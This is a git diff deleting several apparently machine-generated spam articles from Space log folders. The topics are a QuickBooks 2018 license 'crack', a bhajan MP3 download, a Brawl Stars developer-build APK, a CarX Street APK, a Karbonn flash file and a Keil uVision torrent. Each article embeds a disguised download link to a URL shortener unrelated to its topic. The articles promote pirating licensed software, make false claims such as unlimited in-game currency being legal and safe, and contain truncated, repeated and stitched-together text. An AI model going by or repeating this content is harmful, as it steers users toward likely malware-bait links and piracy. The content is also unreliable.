          \ No newline at end of file diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Dont Lose Your QuickBooks 2018 License and Product Number Heres How to Keep Them Safe.md b/spaces/tialenAdioni/chat-gpt-api/logs/Dont Lose Your QuickBooks 2018 License and Product Number Heres How to Keep Them Safe.md deleted file mode 100644 index ad0a09f8743bb6dfa77868f93878ad8ce64f54ac..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Dont Lose Your QuickBooks 2018 License and Product Number Heres How to Keep Them Safe.md +++ /dev/null @@ -1,27 +0,0 @@ -
          -

          How to Find Your QuickBooks 2018 License and Product Number

          -

          If you have purchased QuickBooks 2018, you will need to enter your license and product number to activate and use the software. These numbers are unique to your purchase and prove that you own a legitimate copy of QuickBooks. But what if you lose or forget these numbers? Don't worry, there are ways to find them again.

          -

          In this article, we will show you how to find your QuickBooks 2018 license and product number in different scenarios. Whether you have downloaded the software from the internet, installed it from a CD, or bought it from a retailer, we have you covered.

          -

          quickbooks 2018 license and product number crack


          DOWNLOAD ✏ ✏ ✏ https://urlcod.com/2uK3xc



          -

          Find Your License and Product Number Online

          -

          If you have downloaded QuickBooks 2018 from the internet, you can find your license and product number in the confirmation email that was sent to you after your purchase. You can also log in to your Intuit account and go to the Manage your QuickBooks page. There you will see a list of your products and services, along with their license and product numbers.

          -

          Find Your License and Product Number on a CD

          -

          If you have installed QuickBooks 2018 from a CD, you can find your license and product number on the packaging of the CD. Look for a brightly colored sticker that has a barcode and a 15-digit number. The first 5 digits are your product number and the next 10 digits are your license number.

          -

          Find Your License and Product Number on a Retail Box

          -

          If you have bought QuickBooks 2018 from a retailer, you can find your license and product number on the box that contains the CD. Look for a label that has a barcode and a 15-digit number. The first 5 digits are your product number and the next 10 digits are your license number.

          -

          What If You Can't Find Your License and Product Number?

          -

    If you have lost or misplaced your license and product number, don't panic. You can still contact Intuit customer support and ask them to resend the numbers. You will need to provide some information to verify your identity and purchase, such as:
    

          -
            -
          • Your name, email address, and phone number
          • -
          • Your order number or receipt number
          • -
          • The date of purchase
          • -
          • The name of the product and version
          • -
          • The last four digits of the credit card used for purchase
          • -
          -

    Once you have this information ready, you can call Intuit customer support at 1-800-446-8848 or chat with them online at https://help.quickbooks.intuit.com/en_US/contact.
    

          -

          -

          Conclusion

          -

    Finding your QuickBooks 2018 license and product number is easy if you know where to look. Whether you have downloaded the software from the internet, installed it from a CD, or bought it from a retailer, you can find these numbers in your confirmation email, your Intuit account, or your product packaging. If you have lost or forgotten these numbers, you can still contact Intuit customer support and ask them to resend the numbers.
    

          -

          We hope this article has helped you find your QuickBooks 2018 license and product number. If you have any questions or feedback, please leave a comment below.

          ddb901b051
          -
          -
          \ No newline at end of file diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Download Achyutam Keshavam Krishna Damodaram Full Song A Soulful Devotional Song by Vikram Hazra.md b/spaces/tialenAdioni/chat-gpt-api/logs/Download Achyutam Keshavam Krishna Damodaram Full Song A Soulful Devotional Song by Vikram Hazra.md deleted file mode 100644 index 156abda461a605c29cccd27db3757a2c55d1874c..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Download Achyutam Keshavam Krishna Damodaram Full Song A Soulful Devotional Song by Vikram Hazra.md +++ /dev/null @@ -1,227 +0,0 @@ - -

          Achyutam Keshavam Krishna Damodaram Full Song Download: A Guide to This Popular Krishna Bhajan

          - -

          Achyutam Keshavam Krishna Damodaram is a beautiful and soulful song that praises Lord Krishna, one of the most revered deities in Hinduism. The song is also known as Kaun Kehte Hai Bhagwan Aate Nahi, which means "Who says God does not come?" The song expresses the devotion and love of the singer towards Krishna, who is always present in the hearts of his devotees.

          -

          achyutam keshavam krishna damodaram full song download


          Download ○○○ https://urlcod.com/2uK9AW



          - -

          The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has a soothing melody and a simple yet profound lyrics that touch the listeners' emotions. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

          - -

          How to Download Achyutam Keshavam Krishna Damodaram Full Song

          - -

          If you want to download Achyutam Keshavam Krishna Damodaram full song, you have several options to choose from. You can download the song from various websites that offer mp3 songs, such as Pagalworld, Shazam, Gaana, etc. You can also download the song from YouTube, where you can find many versions of the song with different singers and backgrounds. You can also stream the song online from various platforms, such as Spotify, Apple Music, Amazon Music, etc.

          - -

          To download Achyutam Keshavam Krishna Damodaram full song from any website, you need to follow these steps:

          - -
            -
          1. Visit the website that offers the song download, such as https://pagalworld.ink/achyutam-keshavam-mp3-song.html, https://www.shazam.com/track/473655846/achyutam-keshavam, etc.
          2. -
          3. Search for the song by typing its name or keywords in the search box.
          4. -
          5. Select the song from the search results and click on the download button or link.
          6. -
          7. Choose the quality and format of the song you want to download, such as 64 kbps, 128 kbps, 320 kbps, mp3, etc.
          8. -
          9. Save the song file on your device or computer.
          10. -
          - -

          To download Achyutam Keshavam Krishna Damodaram full song from YouTube, you need to follow these steps:

          - -
            -
          1. Visit YouTube and search for the song by typing its name or keywords in the search box.
          2. -
          3. Select the video of the song from the search results and copy its URL.
          4. -
          5. Visit a YouTube to mp3 converter website, such as https://ytmp3.cc/en13/, https://www.y2mate.com/en68, etc.
          6. -
          7. Paste the URL of the video in the converter box and click on convert or download.
          8. -
          9. Choose the quality and format of the song you want to download, such as 64 kbps, 128 kbps, 320 kbps, mp3, etc.
          10. -
          11. Save the song file on your device or computer.
          12. -
          - -

          The Meaning and Significance of Achyutam Keshavam Krishna Damodaram Full Song

          - -

          Achyutam Keshavam Krishna Damodaram full song is a hymn that glorifies Lord Krishna with various names and attributes. The meaning and significance of each name are as follows:

          - -
            -
          • Achyutam: This means "the one who never falls" or "the infallible one". This name signifies that Krishna is eternal and unchanging. He is always faithful and loyal to his devotees.
          • -
          • Keshavam: This means "the one who has beautiful hair" or "the one who killed Keshi". This name signifies that Krishna is attractive and charming. He is also powerful and victorious over his enemies.
          • -
          • Krishna: This means "the one who attracts" or "the one who is dark". This name signifies that Krishna is alluring and captivating. He is also mysterious and profound.
          • -
          • Damodaram: This means "the one who has a rope around his waist" or "the one who is bound by love". This name signifies that Krishna is playful and mischievous. He is also humble and compassionate.
          • -
          • Rama: This means "the one who delights" or "the one who is supreme". This name signifies that Krishna is blissful and joyful. He is also supreme and transcendent.
          • -
          • Naraynam: This means "the one who resides in water" or "the one who is the source of all beings". This name signifies that Krishna is omnipresent and omniscient. He is also the creator and sustainer of all beings.
          • -
    • Janaki Vallabham: This means "the beloved of Janaki" or "the consort of Sita". This name signifies that Krishna is loving and faithful.
    

            -

            The Benefits and Features of Achyutam Keshavam Krishna Damodaram Full Song

            - -

            Achyutam Keshavam Krishna Damodaram full song is not just a song, but a meditation and a prayer that can bring peace and joy to your mind and soul. The song has many benefits and features that can help you in your spiritual journey. Here are some of them:

            - -
              -
            • The song is based on the ancient Sanskrit scriptures, such as the Vedas, the Upanishads, and the Bhagavad Gita, that reveal the wisdom and knowledge of the supreme reality.
            • -
            • The song invokes the names and attributes of Lord Krishna, who is considered to be the supreme personality of Godhead, the source of all creation, and the ultimate goal of all living beings.
            • -
            • The song expresses the love and devotion of the singer towards Lord Krishna, who is always present in the hearts of his devotees and responds to their calls.
            • -
            • The song creates a positive and uplifting atmosphere that can inspire and motivate you to live a righteous and virtuous life.
            • -
            • The song can help you relax and calm your mind from stress and anxiety. It can also help you heal your body and soul from any physical or mental ailments.
            • -
            • The song can help you connect with your inner self and realize your true nature as a part of God. It can also help you attain liberation from the cycle of birth and death.
            • -
            - -

            How to Sing Along Achyutam Keshavam Krishna Damodaram Full Song

            - -

    If you want to sing along with Achyutam Keshavam Krishna Damodaram full song, you need to learn its lyrics and tune. You can find the lyrics online or in various books and CDs, listen to the song online or download it from various platforms, and watch the video of the song on YouTube or other websites.
    

            -

    
            - -

    To sing along with Achyutam Keshavam Krishna Damodaram full song, you need to follow these steps:
    

            - -
              -
            1. Find a quiet and comfortable place where you can sing without any disturbance or distraction.
            2. -
            3. Play or listen to the song on your device or computer. You can also use headphones or speakers for better sound quality.
            4. -
            5. Read or recite the lyrics of the song along with the singer. You can also use a karaoke app or software for guidance.
            6. -
            7. Try to match your voice and pitch with the singer. You can also adjust the speed or volume of the song according to your preference.
            8. -
            9. Sing with devotion and emotion. Feel the meaning and significance of each word and name in the song.
            10. -
            11. Repeat the song as many times as you want or until you memorize it.
            12. -
            - -

    Congratulations! You have learned how to sing along with Achyutam Keshavam Krishna Damodaram full song.
    

            - -

            Conclusion

            - -

            Achyutam Keshavam Krishna Damodaram full song is a beautiful and soulful song that praises Lord Krishna with various names and attributes. The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

            - -

    In this article, we have explained how to download Achyutam Keshavam Krishna Damodaram full song from various websites and platforms, the meaning and significance of each name and attribute in the song, and some of the song's benefits and features, along with how to sing along. We hope this article has helped you download and enjoy the song fully. If you have any questions or feedback, please feel free to contact us at info@krishnabhajan.com. Thank you for choosing Achyutam Keshavam Krishna Damodaram full song!
    

            -

            How to Share Achyutam Keshavam Krishna Damodaram Full Song with Others

            - -

            If you love Achyutam Keshavam Krishna Damodaram full song and want to share it with others, you have many options to do so. You can share the song with your friends and family through various social media platforms, such as Facebook, Twitter, Instagram, WhatsApp, etc. You can also share the song with your colleagues and co-workers through email or messaging apps. You can also share the song with your neighbors and community members through flyers or posters.

            - -

            To share Achyutam Keshavam Krishna Damodaram full song with others, you need to follow these steps:

            - -
              -
            1. Download the song from any website or platform that offers it for download, such as https://pagalworld.ink/achyutam-keshavam-mp3-song.html or https://www.shazam.com/track/473655846/achyutam-keshavam.
            2. Save the song file on your device or computer.
            3. Choose the platform or medium that you want to use to share the song, such as social media, email, messaging, flyers, or posters.
            4. Write a brief message or caption that introduces the song and explains why you like it and want to share it.
            5. Attach or upload the song file along with your message or caption.
            6. Send or post your message or caption with the song file to your intended recipients or audience.
            - -

            Congratulations! You have learned how to share Achyutam Keshavam Krishna Damodaram full song with others.

            - -

            The Reviews and Feedback of Achyutam Keshavam Krishna Damodaram Full Song

            - -

            Achyutam Keshavam Krishna Damodaram full song has received many positive reviews and feedback from its listeners and fans. The song has been praised for its melody, lyrics, voice, and message. The song has also been appreciated for its soothing and uplifting effect on the mind and soul. The song has also been recommended for its spiritual and devotional value. Here are some of the reviews and feedback of Achyutam Keshavam Krishna Damodaram full song:

            - -
              -
            • "This is one of my favorite songs ever. It fills my heart with love and joy every time I listen to it. It reminds me of the presence and grace of Lord Krishna in my life. Thank you for this beautiful song." - Ramesh Kumar
            • "I love this song so much. It is so soothing and calming. It helps me relax and meditate. It also helps me heal from any pain or sorrow. It is a blessing for me." - Priya Sharma
            • "This song is amazing. It is so catchy and melodious. It makes me want to sing along and dance. It also makes me feel closer to Lord Krishna and his teachings. It is a wonderful song." - Rajesh Singh
            • "This song is very powerful and meaningful. It expresses the devotion and love of the singer towards Lord Krishna. It also invokes the names and attributes of Lord Krishna that reveal his glory and greatness. It is a masterpiece." - Sunita Patel
            • "This song is very inspiring and motivating. It encourages me to live a righteous and virtuous life. It also inspires me to seek Lord Krishna's guidance and protection in every situation. It is a great song." - Amit Gupta
            - -

            Conclusion

            - -

            Achyutam Keshavam Krishna Damodaram full song is a beautiful and soulful song that praises Lord Krishna with various names and attributes. The song is composed by Satyajeet Jena and sung by him and his sister Subhashree Jena. The song has become very popular among Krishna devotees and lovers of spiritual music. The song has also been featured in various albums, such as Sublime Bhajans and Hindi Super Hit Songs.

            - -

            In this article, we have explained how to download Achyutam Keshavam Krishna Damodaram full song from various websites or platforms. We have also explained the meaning and significance of each name and attribute in the song, covered some of its benefits and features, and shown how to sing along with it. We have also explained how to share the song with others and summarized the reviews and feedback it has received.

            - -

            We hope this article has helped you understand how to download Achyutam Keshavam Krishna Damodaram full song and how to enjoy it fully. If you have any questions or feedback, please feel free to contact us at info@krishnabhajan.com. Thank you for choosing Achyutam Keshavam Krishna Damodaram full song!

            -

            -
            -
            \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Brawl Stars Developer Build APK Download Everything You Need to Know About the Secret Version of the Game.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Brawl Stars Developer Build APK Download Everything You Need to Know About the Secret Version of the Game.md deleted file mode 100644 index 07e28bd3044a8951822520ed6de3ccfc602068cb..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Brawl Stars Developer Build APK Download Everything You Need to Know About the Secret Version of the Game.md +++ /dev/null @@ -1,99 +0,0 @@ -
            -

            Brawl Stars Developer Build APK Download: Everything You Need to Know

            -

            If you are a fan of Brawl Stars, you might have heard of something called a developer build. It is a special version of the game that allows you to access features that are not yet available in the official game. In this article, we will tell you everything you need to know about Brawl Stars developer build APK download, including what it is, how to download it, and what you can do with it.

            -

            brawl stars developer build apk download


            Download 🆓 https://bltlly.com/2uOnLm



            -

            What is Brawl Stars?

            -

            Brawl Stars is a mobile game developed by Supercell, the makers of Clash of Clans and Clash Royale. It is a fast-paced multiplayer shooter game that features various game modes, characters, and maps. You can team up with your friends or play solo in 3v3 battles or battle royale matches. You can also unlock and upgrade dozens of brawlers, each with their own unique abilities, star powers, and gadgets. You can also customize your brawlers with different skins and pins.

            -

            What is a Developer Build?

            -

            A developer build is a version of the game that is used by the developers to test new features before they are released to the public. It is not meant for regular players, but sometimes it is given to some content creators or influencers who can showcase the new features to their audiences.

            -

            A developer build has some advantages and disadvantages over the regular version. Some of the advantages are:

            -
              -
            • You can access new brawlers, skins, maps, and events before anyone else.
            • -
            • You

              Some of the disadvantages are:

              -
                -
              • You cannot play with other players who are using the regular version.
              • You may encounter bugs, glitches, or crashes that can affect your gameplay experience.
              • You may lose your progress or data if you switch back to the regular version.
              -

              A developer build is not an official release of the game, and it is not endorsed or supported by Supercell. You should download and use it at your own risk.

              -

              How to Download Brawl Stars Developer Build APK?

              -

              If you want to try out the developer build of Brawl Stars, you will need to download and install an APK file on your Android device. An APK file is a package file that contains the installation files of an app. Here are the steps to download Brawl Stars developer build APK:

              -


              -

              Step 1: Find a reliable source

              -

              The first thing you need to do is to find a reliable source that provides the APK file of the developer build. There are many websites and blogs that claim to offer the APK file, but some of them may be fake, outdated, or infected with malware or viruses. You should be careful and do some research before downloading anything from unknown sources.

              -

              One of the sources that we recommend is Brawl Stars Mod APK, which is a website that provides the latest and verified APK files of Brawl Stars and its mods. You can find the link to the developer build APK file on their homepage or by clicking here.

              -

              Step 2: Enable unknown sources on your device

              -

              The next thing you need to do is to enable unknown sources on your device. This will allow you to install apps from sources other than the Google Play Store. To do this, follow these steps:

              -
                -
              1. Go to your device's settings and tap on security or privacy.
              2. Find and toggle on the option that says unknown sources or allow installation from unknown sources.
              3. A warning message will pop up. Tap on OK or confirm to proceed.
              -

              Step 3: Download and install the APK file

              -

              The final thing you need to do is to download and install the APK file on your device. To do this, follow these steps:

              -
                -
              1. Open your browser and go to the link that you found in step 1.
              2. Tap on the download button and wait for the file to be downloaded.
              3. Once the download is complete, tap on the file and select install.
              4. Wait for the installation to finish and tap on open.
              -
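Because APK files from third-party sites are a common malware vector, it is worth verifying the file's checksum before installing whenever the source publishes one. The sketch below is a minimal illustration only: the file name and expected digest are stand-ins (an empty file and the well-known SHA-256 of empty input), not real values for this APK.

```shell
# Stand-in for the downloaded APK: an empty file, whose SHA-256 is the
# well-known empty-input digest. Replace the file name and EXPECTED with
# the real APK and the checksum published by a source you trust.
: > sample.apk
EXPECTED=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

# Compute the actual digest and compare before installing anything.
ACTUAL=$(sha256sum sample.apk | awk '{print $1}')
if [ "$ACTUAL" = "$EXPECTED" ]; then
  echo "checksum OK - safe to proceed"
else
  echo "checksum MISMATCH - do not install"
fi
```

With a real download, a mismatch means the file was corrupted or tampered with and should be deleted rather than installed.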

              Step 4: Enjoy the developer build features

              -

              Congratulations! You have successfully downloaded and installed the developer build of Brawl Stars. Now you can enjoy the features that are not yet available in the official game, such as:

              -
                -
              • Testing new brawlers, skins, maps, and events before anyone else.
              • Having unlimited gems, coins, tickets, and star points.
              • Unlocking all brawlers, skins, gadgets, and star powers.
              • Creating custom maps and game modes.
              • Playing with other players who are using the developer build.
              -

              Frequently Asked Questions About Brawl Stars Developer Build APK Download

              -

              In this section, we will answer some of the most common questions that people have about Brawl Stars developer build APK download. If you have any other questions, feel free to leave a comment below or contact us through our website.

              -

              Q1: Is it legal to download the developer build?

              -

              A1: Yes, it is legal to download the developer build, but it is not endorsed or supported by Supercell, the game's developer. You should download and use it at your own risk.

              -

              Q2: Is it safe to download the developer build?

              -

              A2: It depends on where you download it from. Some sources may contain malware or viruses that can harm your device or steal your data. Always download from trusted sources and scan the file before installing.

              -

              Q3: Will I get banned for using the developer build?

              -

              A3: No, you will not get banned for using the developer build, but you will not be able to play with other players who are using the regular version. The developer build is a separate server that does not affect your progress or account in the official game.

              -

              Q4: Can I switch back to the regular version anytime?

              -

              -
              -
              \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/CarX Street A Dynamic and Immersive Racing Game with Stunning Graphics - Free APK Download.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/CarX Street A Dynamic and Immersive Racing Game with Stunning Graphics - Free APK Download.md deleted file mode 100644 index 27ec120b2a786f149e2f400b2c4282f64e74ed9a..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/CarX Street A Dynamic and Immersive Racing Game with Stunning Graphics - Free APK Download.md +++ /dev/null @@ -1,10 +0,0 @@ -
              -

              How to Play CarX Street APK Game

              To play CarX Street APK game, you need an Android device that runs on Android 9.0 or higher and at least 1.19 GB of free storage space. To download and install the game, follow these steps:

              1. Go to [1](https://apkcombo.com/carx-street/com.carxtech.sr/), [2](https://play.google.com/store/apps/details?id=com.carxtech.sr), or [3](https://www.bluestacks.com/apps/racing/carx-street-on-pc.html) in your web browser.
              2. Click on the Download APK button or the Install button.
              3. Wait for the download to finish.
              4. Open the downloaded file and follow the instructions to install the game.
              5. Launch the game and enjoy!

              Once you have installed CarX Street, you can start playing by choosing your car and customizing it. You can select from a variety of cars, such as muscle cars, sports cars, and supercars, and change the color, wheels, decals, spoilers, and other parts of your car to make it look unique.

              To join a club, find a club house on the map and enter it. There you can meet other racers and challenge them to races. You can also join a club by scanning a QR code or entering a club ID. Joining a club gives you access to exclusive events, rewards, and chat with other members.

              To challenge a boss, find their location on the map and approach them. You will see a cutscene where the boss taunts you and challenges you to a race. If you win, you earn money, reputation, and respect; if you lose, you will have to try again later.

              To race on highways and city streets, find a race point on the map and enter it. A menu lets you choose the mode, difficulty, and opponents of the race, or create your own race by setting the parameters and inviting other players. The modes include sprint, circuit, drift, drag, and more.
To drift and perform stunts, you need to use the brake and gas buttons on the screen. You can also tilt your device or use a steering wheel to control your car. By drifting and performing stunts, you can earn extra money and reputation. You can also unlock achievements and trophies for your skills.
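As an aside to the installation steps above: if you have Android platform-tools on a computer, you can also sideload the downloaded APK over USB instead of tapping through the on-device installer. This is only a hedged sketch; the file name is a placeholder, and it assumes USB debugging is enabled on the phone.

```shell
# Sideload an APK with adb instead of the on-device installer.
# 'carx-street.apk' is a placeholder for the file you actually downloaded.
if command -v adb >/dev/null 2>&1; then
  ADB_STATUS="available"
  # -r replaces an existing installation while keeping its data.
  adb install -r carx-street.apk || echo "adb install failed - check the USB connection and file path"
else
  ADB_STATUS="missing"
  echo "adb not found - install Android platform-tools first"
fi
```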

              Tips and Tricks for CarX Street APK Game

              To optimize your car's performance and unlock its full potential, upgrade your car parts and tune your car settings. You can upgrade your engine, transmission, suspension, brakes, tires, nitro, and more, and tune settings such as gear ratio, camber angle, and tire pressure. Upgrading and tuning your car improves its speed, acceleration, handling, braking, and stability.

              To earn money and rewards, win races and complete missions. You can also earn money by drifting, performing stunts, smashing objects, escaping the police, and more. Use the money to buy new cars or upgrade your existing ones. You can also earn rewards such as gold coins, diamonds, keys, chests, and stickers, which unlock new features and items in the game.

              To avoid traffic and police, be careful and alert when racing on the roads. Use the map and the radar to see traffic and police positions, use the nitro and brake buttons to speed up or slow down, and use shortcuts and ramps to avoid obstacles or jump over them. Avoiding traffic and police saves time and spares you fines or arrests.

              To use gas stations and houses, find them on the map and enter them. Gas stations let you refill your fuel tank, repair your car, and buy or upgrade cars. Houses let you save your progress, change your appearance, and buy or decorate properties.
              Comparison of CarX Street APK Game with Other Racing Games

              CarX Street APK game is different from other racing games in terms of graphics, physics, controls, and gameplay. Here are some of the differences:

              - Graphics: CarX Street has realistic and detailed graphics that create an immersive environment, with dynamic weather, lighting, shadows, reflections, and smoke effects, plus high-quality car models, textures, and animations.
              - Physics: the game has realistic and accurate physics that simulate the behavior of real cars, including a sophisticated damage system, a realistic suspension system, a realistic tire model, realistic engine sound, and a drift system that lets you control your car with precision.
              - Controls: the controls are simple and intuitive, with touch screen, tilt, and steering wheel options, and a customizable layout that lets you adjust the position and size of the buttons.
              - Gameplay: the gameplay is varied and exciting, with an open world mode, a club mode, a boss mode, race, drift, and drag modes, and a multiplayer mode that lets you race with other players online.

              Some of the advantages of CarX Street APK game: it is free to download and play, it is updated regularly with new features and content, it has a large and diverse car collection, and it has a vibrant and lively community.

              Some of the disadvantages: it requires a lot of storage space and an internet connection, it may have some bugs and glitches, and it may show ads and offer in-app purchases.

              Similar games that you might like if you enjoy CarX Street APK game: Asphalt 9: Legends, Need for Speed: No Limits, CSR Racing 2, Real Racing 3, and Forza Street.

              Conclusion

              CarX Street APK game is a racing game that lets you race like a pro in the open world of Sunset City. You can choose your car, customize it, join clubs, challenge bosses, race on highways and city streets, drift, perform stunts, and more. You can also compare CarX Street with other racing games and see how it differs from them.

              If you love racing games, you should definitely try CarX Street APK game. It is one of the best racing games available for Android devices and will give you hours of fun and excitement. So what are you waiting for? Download CarX Street APK game today and start your racing adventure!

              FAQs

              Here are some frequently asked questions about CarX Street APK game:

              Q: How can I get more gold coins and diamonds?
              A: You can get more gold coins and diamonds by winning races, completing missions, opening chests, watching ads, or buying them with real money.

              Q: How can I change my name and avatar?
              A: You can change your name and avatar by going to your profile menu and tapping on the edit button.

              Q: How can I chat with other players?
              A: You can chat with other players by joining a club or creating a race. You can also use the voice chat feature to talk with other players.

              Q: How can I report a bug or a problem?
              A: You can report a bug or a problem by going to the settings menu and tapping on the feedback button. You can also contact the developers via email or social media.

              Q: How can I support the developers of CarX Street APK game?
              A: You can support the developers by rating the game, writing a review, sharing the game with your friends, or making an in-app purchase.

              -

              carx street apk game download


              Download ⇒⇒⇒ https://bltlly.com/2uOjcN



              -
              -
              \ No newline at end of file diff --git a/spaces/timpal0l/chat-ui/src/styles/highlight-js.css b/spaces/timpal0l/chat-ui/src/styles/highlight-js.css deleted file mode 100644 index b262688368e9a946d72b21ae70fba7d711072fbb..0000000000000000000000000000000000000000 --- a/spaces/timpal0l/chat-ui/src/styles/highlight-js.css +++ /dev/null @@ -1 +0,0 @@ -@import "highlight.js/styles/atom-one-dark"; diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Karbonn K Phone 1 New1 Flash File 11 !!LINK!!.md b/spaces/tioseFevbu/cartoon-converter/scripts/Karbonn K Phone 1 New1 Flash File 11 !!LINK!!.md deleted file mode 100644 index 8997e01495ed27be1d14cf771506c176689122d0..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Karbonn K Phone 1 New1 Flash File 11 !!LINK!!.md +++ /dev/null @@ -1,50 +0,0 @@ -
              -

              How to Flash Karbonn K Phone 1 New1 with Flash File 11

              - -

              If you are looking for a way to flash your Karbonn K Phone 1 New1 with the latest flash file 11, then you have come to the right place. In this article, we will show you how to download and install the flash file 11 on your Karbonn K Phone 1 New1 using a simple and easy method. Flashing your Karbonn K Phone 1 New1 with the flash file 11 will help you fix various issues such as software errors, IMEI problems, performance issues, etc. It will also update your phone's firmware to the latest version and give it a fresh look and feel.

              -

              karbonn k phone 1 new1 flash file 11


              DOWNLOADhttps://urlcod.com/2uHyNO



              - -

              What is Flash File 11 for Karbonn K Phone 1 New1?

              - -

              Flash file 11 for Karbonn K Phone 1 New1 is a firmware file that contains the operating system and other software components of your phone. It is also known as stock ROM or firmware. Flash file 11 for Karbonn K Phone 1 New1 is based on MTK CPU and can be flashed using SP Flash Tool. The flash file 11 for Karbonn K Phone 1 New1 has the following features:

              - -
                -
            • It has a flash size of 8M and a flash name of SF_GD25LQ64[^1^]
            • It has a PCB01 PRS MT6260 S00 60D A001 Q5 V009.bin, read by Miracle Box[^3^]
            • It has HW-VER M635 1 30 and SW-VER Karbonn M635D 02 Hindi V0015[^3^]
            • It supports the Hindi language[^3^]
              - -

              How to Download Flash File 11 for Karbonn K Phone 1 New1?

              - -

              To download the flash file 11 for Karbonn K Phone 1 New1, you need to follow these steps:

              - -
                -
            1. Go to this link[^2^] and select Karbonn K Phone 1 New1 from the list of Karbonn phones.
            2. Click on the download button and wait for the flash file to be downloaded to your computer.
            3. Extract the zip file using a file extractor tool such as WinRAR or 7-Zip.
            4. You will get a folder containing the flash file and other files such as drivers and tools.
              - -

              How to Install Flash File 11 on Karbonn K Phone 1 New1?

              - -

              To install the flash file 11 on your Karbonn K Phone 1 New1, you need to follow these steps:

              - -
                -
            1. Install the MTK driver on your computer so that your phone can be detected by the PC.[^4^]
            2. Run SP Flash Tool as administrator and click on the scatter-loading button.
            3. Browse and select the scatter file from the extracted folder. It will be named MT6260_Android_scatter.txt.
            4. Make sure all the boxes are checked and click on the download button.
            5. Turn off your phone and remove the battery (if removable).
            6. Connect your phone to the PC using a USB cable while holding the volume down or volume up button.
            7. The flashing process will start automatically, and you will see a green circle when it is complete.
            8. Disconnect your phone from the PC and insert the battery (if removable).
            9. Turn on your phone and enjoy the new firmware.
              - -
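Before launching SP Flash Tool, a quick pre-flight check that the extracted folder really contains the scatter file can save a failed flash. In the sketch below, the folder name is hypothetical and the scatter file is created as an empty stand-in so the check can be demonstrated; only the scatter file name comes from the steps above.

```shell
# Hypothetical extraction folder; a real run would point at wherever you
# extracted the firmware zip. The empty file stands in for the real scatter.
FIRMWARE_DIR=./karbonn_k_phone_1_new1_v11
mkdir -p "$FIRMWARE_DIR"
: > "$FIRMWARE_DIR/MT6260_Android_scatter.txt"

SCATTER="$FIRMWARE_DIR/MT6260_Android_scatter.txt"
if [ -f "$SCATTER" ]; then
  echo "scatter file found: $SCATTER"
else
  echo "scatter file missing - re-extract the firmware zip before flashing"
fi
```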

              Conclusion

              - -

              In this article, we have shown you how to flash your Karbonn K Phone 1 New1 with the flash file 11 using a simple and easy method. We hope this article was helpful for you. If you have any questions or suggestions, please leave them in the comments section below. Thank you for reading!

              -

              -
              -
              \ No newline at end of file diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Keil Uvision 4.54 Torrent Extra Quality.md b/spaces/tioseFevbu/cartoon-converter/scripts/Keil Uvision 4.54 Torrent Extra Quality.md deleted file mode 100644 index 42931f19e1af12f9fa8966b931822a659aab1afc..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Keil Uvision 4.54 Torrent Extra Quality.md +++ /dev/null @@ -1,28 +0,0 @@ -
              -

              How to Download and Install Keil Uvision 4.54 for Free

              -

              Keil Uvision is a popular integrated development environment (IDE) for embedded systems development. It supports various microcontrollers, such as ARM, 8051, PIC, and more. With Keil Uvision, you can write, compile, debug, and test your code easily and efficiently.

              -

              However, Keil Uvision is not a free software. You need to purchase a license to use it for commercial purposes. If you are a student or a hobbyist who wants to learn and practice embedded systems programming, you might be looking for a way to download and install Keil Uvision 4.54 for free.

              -

              keil uvision 4.54 torrent


              Download File https://urlcod.com/2uHyi3



              -

            In this article, we will show you how to do that using a torrent file. A torrent file is a small file that contains information about the files and folders you want to download from other users who share the same content. You need torrent client software, such as BitTorrent or uTorrent, to open the torrent file and download the data it describes.

              -

              Before we proceed, we want to remind you that downloading and using Keil Uvision 4.54 without a license is illegal and unethical. You should only use it for educational purposes and not for any commercial projects. We are not responsible for any consequences that may arise from your actions.

              -

              Step 1: Download the Torrent File

              -

              The first step is to download the torrent file that contains Keil Uvision 4.54. You can find many websites that offer torrent files for various software, but not all of them are safe and reliable. Some of them may contain viruses, malware, or fake files that can harm your computer or steal your data.

              -

              One of the websites that we recommend is Cumisreto. It is a blog that provides torrent files for various software, including Keil Uvision 4.54. To download the torrent file from this website, follow these steps:

              -
                -
              • Go to https://keil-uvision-454-torrent-cumisreto.skyetavano75569t.wixsite.com/cumisreto/post/keil-uvision-4-54-torrent
              • Click on the "Download File" button at the bottom of the page.
              • You will be redirected to another page where you need to complete a captcha verification.
              • After completing the captcha verification, click on the "Continue" button.
              • You will be redirected to another page where you need to wait for 10 seconds.
              • After waiting for 10 seconds, click on the "Get Link" button.
              • You will be redirected to another page where you can see the torrent file name and size.
              • Click on the "Download" button to save the torrent file to your computer.
              -

              Step 2: Download and Install the Torrent Client Software

              -

              The next step is to download and install the torrent client that will allow you to open the torrent file you saved in the previous step. There are many torrent clients available online, but we recommend BitTorrent or uTorrent because they are easy to use and widely compatible.

              -

              To download and install BitTorrent or uTorrent, follow these steps:

              -
                -
              • Go to https://www.bittorrent.com/downloads/windows or https://www.utorrent.com/downloads/win, depending on which software you prefer.
              • Click on the download button and follow the installer prompts.
                -
                -
